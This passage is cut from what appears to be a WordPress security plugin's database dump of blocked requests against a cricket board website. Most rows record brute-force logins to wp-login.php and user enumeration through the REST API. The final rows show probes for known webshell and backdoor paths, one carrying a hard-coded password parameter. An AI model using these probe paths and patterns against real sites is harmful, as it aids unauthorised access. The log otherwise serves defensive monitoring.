Gecko\\/20100101 Firefox\\/31.0\"}','TeNiE2atP5Rv1mVygk8fWI9l',0,1674333136.1054,129,'','POST',403,0,600,0,1,'',0),('93.114.185.76',1567799628,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','zQHpR8xsq9lTkfhZIM3W2Gy0',0,1674333370.0191,257,'','POST',403,0,600,0,1,'',0),('198.98.60.32',3328326688,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','NygZI5DbJ7PAtYOLrn03eKWk',0,1674334838.3319,115,'','POST',403,0,600,0,1,'',0),('159.223.168.91',2682234971,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','zq7LYir9A3wthJIGC6cbKjfV',0,1674337640.2777,194,'','POST',403,0,600,0,1,'',0),('65.109.173.30',1097706782,'','https://yorkshirecricketboard.org.uk/wp-json/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36 Edge\\/18.17763\"}','FeIQqUnkALH2Xpst0YxB8Joh',0,1674338868.7010,141,'','GET',403,0,520,0,1,'',0),('65.109.173.30',1097706782,'','https://www.yorkshirecricketboard.org.uk/wp-json/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36 Edge\\/18.17763\"}','7yRpDlxSMknIVqwA5FQYK9tX',0,1674338869.5774,100,'','GET',403,0,520,0,1,'',0),('65.109.173.30',1097706782,'','https://yorkshirecricketboard.org.uk/?rest_route=/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36 Edge\\/18.17763\"}','bhyVgX3AEMrKFQRjc56B2OLS',0,1674338871.0172,101,'','GET',403,0,520,0,1,'',0),('65.109.173.30',1097706782,'','https://www.yorkshirecricketboard.org.uk/?rest_route=/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36 Edge\\/18.17763\"}','NASW3sXnYcOuh9He7ylPvMI4',0,1674338871.8353,101,'','GET',403,0,520,0,1,'',0),('198.98.50.216',3328324312,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.76.4 (KHTML, like Gecko) Version\\/7.0.4 Safari\\/537.76.4\"}','2jwHg05o8ytuYiT9dObzXBkS',0,1674340339.8561,154,'','POST',403,0,600,0,1,'',0),('69.163.207.121',1168363385,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','7IpFkQbPHADZ6wuxOsK4YERz',0,1674340994.8018,151,'','POST',403,0,600,0,1,'',0),('209.141.57.9',3515693321,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','d7yY5bFzkpt4KaoTL8hSR0GD',0,1674341103.5004,115,'','POST',403,0,600,0,1,'',0),('209.141.48.210',3515691218,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','7zb6IJO2qen8mP5BpGKNSiFA',0,1674342973.0560,131,'','POST',403,0,600,0,1,'',0),('209.141.48.210',3515691218,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D167 Safari\\/9537.53\"}','tMH68USdDjZKoOkA3NznBRm7',0,1674343886.9214,117,'','POST',403,0,600,0,1,'',0),('209.141.44.126',3515690110,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','lpvDzFcJU5oenVq7fM2xyrsT',0,1674344093.3430,104,'','POST',403,0,600,0,1,'',0),('209.141.52.244',3515692276,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','KuCtf1hH2AGJXbPOrE8ZNF9g',0,1674345228.8447,114,'','POST',403,0,600,0,1,'',0),('51.222.138.98',870222434,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','OGLfdixPtHkJEvujeWFY7lS5',0,1674349877.8543,980,'','POST',403,0,600,0,1,'',0),('45.61.184.58',759019578,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.78.2 (KHTML, like Gecko) Version\\/7.0.6 Safari\\/537.78.2\"}','Jz4WZg180b6VMc2TmGxAO9tF',0,1674352713.6832,1343,'','POST',403,0,600,0,1,'',0),('198.98.60.32',3328326688,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','4PzEBf6DJC2LQk3W8sdH1ZNt',0,1674352929.1765,1241,'','POST',403,0,600,0,1,'',0),('69.163.186.158',1168358046,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','ewQ8rultCzSgNMy0FTn7KdZx',0,1674353408.2602,1329,'','POST',403,0,600,0,1,'',0),('104.244.75.243',1760840691,'','https://yorkshirecricketboard.org.uk//wp-json/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','YLHPwOCtZKQ14Jb27DGTuUpr',0,1674355601.6907,958,'','GET',403,0,520,0,1,'',0),('205.185.116.156',3451483292,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux i686) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','8EFMxSCtN5nZgIXjypJWhkK3',0,1674355821.6364,685,'','POST',403,0,600,0,1,'',0),('209.141.57.9',3515693321,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','uCOJsKta01SzVymXxUGnlrMP',0,1674357413.8449,303,'','POST',403,0,600,0,1,'',0),('31.192.224.145',532734097,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','2ypRXSHJB0qvMA3UzjZDbkcK',0,1674357757.8780,159,'','POST',403,0,600,0,1,'',0),('107.189.13.99',1807551843,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','g64JqXnMPCDUQhczSuLGAaje',0,1674359153.3234,196,'','POST',403,0,600,0,1,'',0),('104.244.77.229',1760841189,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit\\/537.51.1 (KHTML, like Gecko) GSA\\/4.1.0.31802 Mobile\\/11D257 Safari\\/9537.53\"}','Mj80Yq52zpQH1ry3ZtWRLPDS',0,1674359260.5521,171,'','POST',403,0,600,0,1,'',0),('107.189.14.89',1807552089,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko\\/20100101 Firefox\\/29.0\"}','z1ONgqnZ8L45kDox3vWifdlK',0,1674361175.5297,156,'','POST',403,0,600,0,1,'',0),('45.61.184.58',759019578,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko\\/20100101 Firefox\\/29.0\"}','OjLePQ8rxhR4fv7oE5CgcBS1',0,1674361447.9206,141,'','POST',403,0,600,0,1,'',0),('198.98.49.240',3328324080,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','sPBEXtu2xWdboLf36c98OQMi',0,1674361686.3690,171,'','POST',403,0,600,0,1,'',0),('45.61.188.188',759020732,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\\/5.0)\"}','2usmOIBDTl8FjcJLiKQ6C4tY',0,1674365502.6212,134,'','POST',403,0,600,0,1,'',0),('24.199.86.99',415716963,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2272.101 Safari\\/537.36\"}','5bCclxwjMA462NuOiS9ng7Gp',0,1674370362.8094,288,'','POST',403,0,600,0,1,'',0),('45.61.187.99',759020387,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','2rxT1pyOzXJas8iFgPGqHDQS',0,1674371888.5121,136,'','POST',403,0,600,0,1,'',0),('209.141.52.244',3515692276,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','Vo4nJfB3xZ5YrIidO0DpQR6H',0,1674373699.8109,129,'','POST',403,0,600,0,1,'',0),('209.141.52.244',3515692276,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','8nqyKgsaXbeANQFldLkUcS5t',0,1674373801.6738,114,'','POST',403,0,600,0,1,'',0),('209.141.52.244',3515692276,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','0FbclO1GydZjI3eSqsxgYDH8',0,1674374107.0689,154,'','POST',403,0,600,0,1,'',0),('209.141.52.244',3515692276,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','JZfs5QNSpjPEoI9Dd8iRCHBV',0,1674374170.7843,413,'','POST',403,0,600,0,1,'',0),('199.195.254.123',3351510651,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','gK2AOuX4c9aBIDztLNvSo6dG',0,1674374695.2054,116,'','POST',403,0,600,0,1,'',0),('5.188.62.76',96222796,'','https://yorkshirecricketboard.org.uk/wp-login.php?wp_lang=en_US','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4895.86 Safari\\/537.36\"}','XDVcwx8s4kQNUOnlELJz7be2',0,1674379599.1917,124,'','POST',403,0,600,0,1,'',0),('217.76.155.6',3645676294,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','hr2QL3vfZVGmscnoi4PHRAut',0,1674383344.5738,169,'','POST',403,0,600,0,1,'',0),('209.141.36.190',3515688126,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.76.4 (KHTML, like Gecko) Version\\/7.0.4 Safari\\/537.76.4\"}','m8l1cpMKdn5ExwWrX0NIUVaZ',0,1674385317.5081,167,'','POST',403,0,600,0,1,'',0),('172.104.81.115',2892517747,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TgHPGBxfcsRVAduNYlonb2MZ',0,1674386740.8123,130,'','POST',403,0,600,0,1,'',0),('93.113.111.100',1567715172,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nUAtzS2LjsOkEgPJDIaV45ox',0,1674388623.9010,130,'','POST',403,0,600,0,1,'',0),('47.110.72.238',795756782,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','dByu1GZgISvWeYVfLhxFJ9lz',0,1674389710.0705,197,'','POST',403,0,600,0,1,'',0),('205.185.116.162',3451483298,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\\/5.0)\"}','V0hTLtXBx4MJCHbo6g1aleYu',0,1674390491.4478,112,'','POST',403,0,600,0,1,'',0),('209.141.49.253',3515691517,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.77.4 (KHTML, like Gecko) Version\\/7.0.5 Safari\\/537.77.4\"}','pyvKeF2J5AkoSGfjXMhE4WmO',0,1674390684.4209,105,'','POST',403,0,600,0,1,'',0),('209.141.43.56',3515689784,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Trident\\/7.0; rv:11.0) like Gecko\"}','PX2O1w3U0eKQH59jdLJ6EhvV',0,1674397215.4936,194,'','POST',403,0,600,0,1,'',0),('65.109.173.30',1097706782,'','https://www.yorkshirecricketboard.org.uk/wp-json/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36 Edge\\/18.17763\"}','JwFXck70YWDlexTjEv9HqR2B',0,1674397342.9793,140,'','GET',403,0,520,0,1,'',0),('65.109.173.30',1097706782,'','https://yorkshirecricketboard.org.uk/wp-json/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36 Edge\\/18.17763\"}','C50YhwjFVDS2gn1WGoe3LNBv',0,1674397343.6140,164,'','GET',403,0,520,0,1,'',0),('65.109.173.30',1097706782,'','https://www.yorkshirecricketboard.org.uk/?rest_route=/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36 Edge\\/18.17763\"}','FWq6bfiPsmZ1YcgUHGxh7LN9',0,1674397344.5917,107,'','GET',403,0,520,0,1,'',0),('65.109.173.30',1097706782,'','https://yorkshirecricketboard.org.uk/?rest_route=/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36 Edge\\/18.17763\"}','pckZ3mFR04YzQjNJe9b6DduO',0,1674397345.2023,144,'','GET',403,0,520,0,1,'',0),('107.189.1.148',1807548820,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','upL1dmWcoqS6QTDjxB452Kbl',0,1674398063.1491,130,'','POST',403,0,600,0,1,'',0),('209.141.47.94',3515690846,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','V7mTAhHNlOw8bLsQ1ceu0Rgr',0,1674399513.5583,119,'','POST',403,0,600,0,1,'',0),('198.98.50.216',3328324312,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','HyehrxvkoIiaRt4K02U5wPOS',0,1674399886.8513,119,'','POST',403,0,600,0,1,'',0),('209.141.37.194',3515688386,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','zZf7nTC0s4aYH89ecB61gywG',0,1674400130.3041,110,'','POST',403,0,600,0,1,'',0),('45.61.186.46',759020078,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','750taNVHCmhgsd9oBk4EjQfI',0,1674401956.8183,127,'','POST',403,0,600,0,1,'',0),('198.98.50.216',3328324312,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','qdkLsCUie9IVtZoPNFvc4bHx',0,1674403061.1764,119,'','POST',403,0,600,0,1,'',0),('199.195.253.123',3351510395,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit\\/538.46 (KHTML, like Gecko) Version\\/8.0 Safari\\/538.46\"}','yrtY0KRoFxkTWsva7B6SDIXL',0,1674403556.7432,111,'','POST',403,0,600,0,1,'',0),('51.91.151.60',861640508,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','jmzR7cPno1bWHGhVIdJ2wDZq',0,1674413139.8981,459,'','POST',403,0,600,0,1,'',0),('143.110.152.206',2406389966,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','e4DilCHJO7cKSZo2fqXxAQGd',0,1674416503.0402,1133,'','POST',403,0,600,0,1,'',0),('167.99.127.239',2808315887,'','https://yorkshirecricketboard.org.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','RUftburCdYzS3snghQ0yKIjk',0,1674417798.5853,105,'','GET',403,0,520,0,1,'',0),('146.56.99.136',2453169032,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','Bsi40M2gKaE6knXIcLZwupQR',0,1674419762.9514,201,'','POST',403,0,600,0,1,'',0),('20.166.248.192',346486976,'','https://yorkshirecricketboard.org.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/95.0.4638.69 Safari\\/537.36\"}','n0xKP5iF7DqjJmhQHS1zBbY3',0,1674423931.4305,100,'','GET',403,0,520,0,1,'',0),('20.166.248.192',346486976,'','https://yorkshirecricketboard.org.uk//wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/95.0.4638.69 Safari\\/537.36\",\"2\":\"https:\\/\\/yorkshirecricketboard.org.uk\\/\\/wp-login.php\"}','bTxBkVPm3Lzy1IgQlRSZX9pA',0,1674423931.8211,114,'','POST',403,0,600,0,1,'',0),('205.185.116.156',3451483292,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit\\/534.59.10 (KHTML, like Gecko) Version\\/5.1.9 Safari\\/534.59.10\"}','kcNwsf3QgH40udBTXWlRy9oF',0,1674424515.8654,118,'','POST',403,0,600,0,1,'',0),('46.101.150.34',778409506,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','1KXpUPEx8Jn24gO7RD0juHWh',0,1674425225.2747,151,'','POST',403,0,600,0,1,'',0),('47.110.72.238',795756782,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','jH8SdEwvke5apuVh7lyx91Wn',0,1674430341.4267,779,'','POST',403,0,600,0,1,'',0),('107.189.13.99',1807551843,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','isV0NnQfEIHSLhpZ2o6K5dbR',0,1674433077.7267,165,'','POST',403,0,600,0,1,'',0),('125.227.127.195',2112061379,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','r5UZFdgPt7COINT1RjfGDwmy',0,1674436497.4585,734,'','POST',403,0,600,0,1,'',0),('178.128.187.183',2994781111,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','PBdzye24U5a1SqGjgwtQA0TN',0,1674447473.0575,452,'','POST',403,0,600,0,1,'',0),('20.245.185.110',351648110,'','https://yorkshirecricketboard.org.uk/wp-content/themes/pridmag/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','woQEe4cHI9xMyUitADbOP8sN',0,1674477098.4210,140,'','GET',403,0,700,0,1,'',0),('20.245.185.110',351648110,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/linkpreview/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','cI0mS2lb68Y5ArwNPzjfXMyJ',0,1674477105.2330,100,'','GET',403,0,700,0,1,'',0),('20.245.185.110',351648110,'','https://yorkshirecricketboard.org.uk/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','0TAgIdBzb7pt1wVZuoMh43rH',0,1674477108.9890,115,'','GET',403,0,700,0,1,'',0),('20.245.185.110',351648110,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','ePJbR7dnkjwDvW4af9AKS6mT',0,1674477124.9051,102,'','GET',403,0,700,0,1,'',0),('20.245.185.110',351648110,'','https://yorkshirecricketboard.org.uk/wp-includes/css/css.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','KgCxGH2LcaTk4ntoWBu0Xmpj',0,1674477132.7037,116,'','GET',403,0,700,0,1,'',0),('20.245.185.110',351648110,'','https://yorkshirecricketboard.org.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','5tkqTj7umdo1BDxWVRNyZa6w',0,1674477136.6598,105,'','GET',403,0,700,0,1,'',0),('20.245.185.110',351648110,'','https://yorkshirecricketboard.org.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','uMvECihpzGoe0BxmLr6X9HFd',0,1674477139.8529,98,'','GET',403,0,700,0,1,'',0),('20.245.185.110',351648110,'','https://yorkshirecricketboard.org.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','NUvCGZhFkjfy0PIrmeERo5aL',0,1674477142.6350,100,'','GET',403,0,700,0,1,'',0),('20.245.185.110',351648110,'','https://yorkshirecricketboard.org.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','4WqADQie6Oz2pbaNLvMKYHUd',0,1674477145.2229,123,'','GET',403,0,700,0,1,'',0),('20.245.185.110',351648110,'','https://yorkshirecricketboard.org.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie 